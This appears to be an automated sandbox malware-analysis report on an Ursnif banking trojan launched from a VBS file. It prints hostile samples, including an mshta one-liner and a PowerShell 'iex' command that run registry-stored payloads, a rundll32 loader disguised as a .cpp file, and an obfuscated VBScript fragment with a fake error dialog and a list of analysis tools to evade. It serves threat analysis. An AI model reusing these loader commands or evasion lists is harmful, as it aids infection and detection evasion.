Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\fum.cpp 8C5BA29FBEEDF62234916D84F3A857A3B086871631FD87FABDFC0818CF049587
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_00E540DC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 21_2_00E540DC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_00E56EB3 GetProcAddress,NtCreateSection,memset, 21_2_00E56EB3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_00E57666 NtMapViewOfSection, 21_2_00E57666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_00E58055 NtQueryVirtualMemory, 21_2_00E58055
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_0558B58C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 21_2_0558B58C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_0558A71C NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 21_2_0558A71C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_055737F6 HeapFree,memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, 21_2_055737F6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_0558F7F5 NtQueryInformationProcess, 21_2_0558F7F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_0559079B GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 21_2_0559079B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05586657 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 21_2_05586657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05580E3E NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 21_2_05580E3E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_055909D7 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 21_2_055909D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_0558B878 GetProcAddress,NtCreateSection,memset, 21_2_0558B878
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05585878 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 21_2_05585878
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_0558A8F7 NtMapViewOfSection, 21_2_0558A8F7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05588890 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 21_2_05588890
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05579D36 NtGetContextThread,RtlNtStatusToDosError, 21_2_05579D36
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_055855D6 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 21_2_055855D6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05580CEF NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 21_2_05580CEF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_0557579C NtQuerySystemInformation,RtlNtStatusToDosError, 21_2_0557579C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05580FBD memset,NtQueryInformationProcess, 21_2_05580FBD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05575166 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 21_2_05575166
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_0558FBB9 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 21_2_0558FBB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05590BAB NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 21_2_05590BAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3E8B90 NtMapViewOfSection, 31_2_000002174F3E8B90
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3E5B80 NtCreateSection, 31_2_000002174F3E5B80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3EE95C NtSetContextThread,NtUnmapViewOfSection, 31_2_000002174F3EE95C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3E1950 NtWriteVirtualMemory, 31_2_000002174F3E1950
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3EE860 NtQueryInformationProcess, 31_2_000002174F3EE860
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3F20A4 NtQueryInformationToken,NtQueryInformationToken, 31_2_000002174F3F20A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3FA8F0 NtSetInformationProcess,CreateRemoteThread,ResumeThread, 31_2_000002174F3FA8F0
Source: C:\Windows\System32\control.exe Code function: 38_2_000CE860 NtQueryInformationProcess, 38_2_000CE860
Source: C:\Windows\System32\control.exe Code function: 38_2_000D20A4 NtQueryInformationToken,NtQueryInformationToken,NtClose, 38_2_000D20A4
Source: C:\Windows\System32\control.exe Code function: 38_2_000DA8F0 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 38_2_000DA8F0
Source: C:\Windows\System32\control.exe Code function: 38_2_000DD110 RtlAllocateHeap,NtQueryInformationProcess, 38_2_000DD110
Source: C:\Windows\System32\control.exe Code function: 38_2_000CE95C NtSetContextThread,NtUnmapViewOfSection,NtClose, 38_2_000CE95C
Source: C:\Windows\System32\control.exe Code function: 38_2_000C1950 NtWriteVirtualMemory, 38_2_000C1950
Source: C:\Windows\System32\control.exe Code function: 38_2_000C5B80 NtCreateSection, 38_2_000C5B80
Source: C:\Windows\System32\control.exe Code function: 38_2_000C8B90 NtMapViewOfSection, 38_2_000C8B90
Source: C:\Windows\System32\control.exe Code function: 38_2_000BFCA8 NtAllocateVirtualMemory, 38_2_000BFCA8
Source: C:\Windows\System32\control.exe Code function: 38_2_000B4580 NtReadVirtualMemory, 38_2_000B4580
Source: C:\Windows\System32\control.exe Code function: 38_2_000EF004 NtProtectVirtualMemory,NtProtectVirtualMemory, 38_2_000EF004
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AD20A4 NtQueryInformationToken,NtQueryInformationToken,NtClose, 40_2_00000195D8AD20A4
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8ACE860 NtQueryInformationProcess, 40_2_00000195D8ACE860
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AEF004 NtProtectVirtualMemory,NtProtectVirtualMemory, 40_2_00000195D8AEF004
PE file does not import any functions
Source: wyozc5bn.dll.35.dr Static PE information: No import functions for PE file found
Source: uitt4j30.dll.33.dr Static PE information: No import functions for PE file found
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20210910
Source: classification engine Classification label: mal100.bank.troj.evad.winVBS@29/21@5/1
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\345678.vbs'
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\345678.vbs'
Source: unknown Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: unknown Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rm6e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rm6e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES36.tmp' 'c:\Users\user\AppData\Local\Temp\uitt4j30\CSC1FA535E1192D4199A0DB18CBAD2D0A9.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC9.tmp' 'c:\Users\user\AppData\Local\Temp\wyozc5bn\CSC8A734EFC87854564869CBAF05337FE1.TMP'
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\76A9.bi1'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES36.tmp' 'c:\Users\user\AppData\Local\Temp\uitt4j30\CSC1FA535E1192D4199A0DB18CBAD2D0A9.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC9.tmp' 'c:\Users\user\AppData\Local\Temp\wyozc5bn\CSC8A734EFC87854564869CBAF05337FE1.TMP'
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\76A9.bi1'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\adobe.url
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_00E52102 CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,CloseHandle, 21_2_00E52102
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{DE70903F-A522-C073-1FF2-A9F4C346ED68}
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{965F7604-FD91-382B-372A-81EC5BFE45E0}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2424:120:WilError_01
Source: C:\Windows\System32\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{BA6EB6AE-D1AE-FC19-2B8E-95F08FA29924}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7044:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{5AA57996-F134-9CA9-4B2E-B590AF42B9C4}
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: 345678.vbs Static file information: File size 1397341 > 1048576
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.pdb@ source: powershell.exe, 0000001F.00000002.777223322.0000021753319000.00000004.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.pdbXP+s source: powershell.exe, 0000001F.00000002.777223322.0000021753319000.00000004.00000001.sdmp
Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000001.00000003.535291067.000001763BDE4000.00000004.00000001.sdmp, fum.cpp.1.dr
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000015.00000003.679916325.0000000005A50000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000015.00000003.679916325.0000000005A50000.00000004.00000001.sdmp

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)REM diary character casework. 6326440 Fayetteville flaxen Doolittle Ballard backpack Alcoa loyal offertory Nicaragua axe Toni End WithEAX = MsgBox("Cant start because MSVCR101.dll is missing from your computer. Try reinstalling the program to fix this problem.", vbSystemModal+vbCritical, "System Error")Gnk("DEBUG: F_MESSAGE - True")REM bow megabyte plenitude aspirate stationery. handicapper nit frozen restaurateur Tennessee Millikan hark limerick Macedon camel Brandon hereunto disquisition plasm anatomic End FunctionFunction yNzk()Gnk("DEBUG: FS_PROCESS - Start")REM emboss indigestion surly rebuttal Kaskaskia upslope lightface stimulus vintner tabernacle male shy inhibit bravado mozzarella otherwise Gnk("DEBUG: FS_PROCESSCOUNT - Start")on error resume nextDim Theodosian,AFQTheodosian=6000' elongate conjoin protactinium monocular warplane riot rubidium bebop skyward contributory metabole stepchild lenticular rich fleabane Frisian AFQ=3000Randomize' thieving Kurt sovereign Simpson, anthropomorphic rhombic Monica loan transpose larch least farmhouse mercuric, tabletop hoosegow highboy camelopard WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)yDVFproc = ((((42 + (-27.0)) + 343.0) - 276.0) + (-82.0))wSQ = 
Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplorer.exe","sftdcc.exe","autorepgui.exe","httplog.exe","ping.exe","shutdownmon.exe","autoruns.exe","icesword.exe","pr0c3xp.exe","sniffhit.exe","autorunsc.exe","iclicker-release.exe",".exe","prince.exe","snoop.exe","autoscreenshotter.exe","idag.exe","procanalyzer.exe","spkrmon.exe","avctestsuite.exe","idag64.exe","processhacker.exe","sysanalyzer.exe","avz.exe","idaq.exe","processmemdump.exe","syser.exe","behaviordumper.exe","immunitydebugger.exe","procexp.exe","systemexplorer.exe","bindiff.exe","importrec.exe","procexp64.exe","systemexplorerservice.exe","BTPTrayIcon.exe","imul.exe","procmon.exe","sython.exe","capturebat.exe","Infoclient.exe","procmon64.exe","taskmgr.exe","cdb.exe","installrite.exe","python.exe","taslogin.exe","ipfs.exe","pythonw.exe","tcpdump.exe","clicksharelauncher.exe","iprosetmonitor.exe","qq.exe","tcpview.exe","closepopup.exe","iragent.exe","qqffo.exe","timeout.exe","commview.exe","iris.exe","qqprotect.exe","totalcmd.exe","cports.exe","joeboxcontrol.exe","qqsg.exe","trojdie.kvpcrossfire.exe","joeboxserver.exe","raptorclient.exe","txplatform.exe","dnf.exe","lamer.exe","regmon.exe","virus.exe","dsniff.exe","LogHTTP.exe","regshot.exe","vx.exe","dumpcap.exe","lordpe.exe","RepMgr64.exe","win
Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_00E57AB0 push ecx; ret 21_2_00E57AB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_00E57E1F push ecx; ret 21_2_00E57E2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_055876C0 push ss; ret 21_2_055876C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05594EE0 push ecx; ret 21_2_05594EE9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_0559528F push ecx; ret 21_2_0559529F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3DC6E9 push 3B000001h; retf 31_2_000002174F3DC6EE
Source: C:\Windows\System32\control.exe Code function: 38_2_000BC6E9 push 3B000001h; retf 38_2_000BC6EE
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8ABC6E9 push 3B000001h; retf 40_2_00000195D8ABC6EE
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05585529 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 21_2_05585529
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.cmdline'

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\fum.cpp
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.dll
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\fum.cpp

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.614926356.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.615093761.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.756395478.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.693266563.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.615032567.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.615070826.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.693369864.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.622629289.0000000004FBC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.754195346.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.615054259.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.615001343.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.615108911.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.614962724.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.693393885.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.754218301.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.758341683.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.618072747.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.740363457.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.754002783.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6072, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 2896, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4612, type: MEMORYSTR
Source: Yara match File source: 21.3.rundll32.exe.50ba4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.50ba4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.5168d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.51394a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000026.00000000.689267141.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.752570656.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.620983509.0000000005139000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.798303359.000002413CA11000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000000.690928250.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
